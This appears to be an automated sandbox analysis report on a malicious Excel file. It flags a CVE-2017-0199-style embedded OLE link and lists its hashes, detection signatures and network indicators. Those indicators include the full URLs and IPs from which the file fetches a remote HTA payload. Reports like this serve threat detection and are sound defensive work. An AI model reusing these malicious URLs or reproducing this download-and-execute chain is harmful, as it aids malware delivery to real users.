Windows Analysis Report
SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx

Overview

General Information

Sample name: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
Analysis ID: 1541459
MD5: 3d36155c4af65b9dd19c7da9ed0461dd
SHA1: 5ba7e33fbc5c6d208daaf5665176defb13aa1c65
SHA256: 1078b2b307b35167121d518c004f8403f4d52bdb41c9f399fa141bf3a6f3c4ae
Tags: xlsx

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx ReversingLabs: Detection: 45%
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: global traffic DNS query: name: u4u.kids
Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161
Source: global traffic TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162
Source: Joe Sandbox View IP Address: 24.199.88.84 24.199.88.84
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.175.113.214:80
Source: global traffic HTTP traffic detected: GET /n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 107.175.113.214
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51302D8.emf
Source: global traffic DNS traffic detected: DNS query: u4u.kids
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:19:25 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 107.175.113.214 Port 80</address></body></html>
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx, EC130000.0.dr String found in binary or memory: https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famo
Source: unknown Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49161

System Summary

Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE: Microsoft Excel 2007+
Source: EC130000.0.dr OLE: Microsoft Excel 2007+
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE indicator, VBA macros: true
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: EC130000.0.dr Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?&regulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W
Source: classification engine Classification label: mal56.winXLSX@1/7@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR8AE0.tmp
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx OLE indicator, Workbook stream: true
Source: EC130000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx ReversingLabs: Detection: 45%
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: EC130000.0.dr Initial sample: OLE indicators vbamacros = False
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Initial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx Stream path 'Workbook' entropy: 7.9744732217 (max. 8.0)
Source: EC130000.0.dr Stream path 'Workbook' entropy: 7.97390903279 (max. 8.0)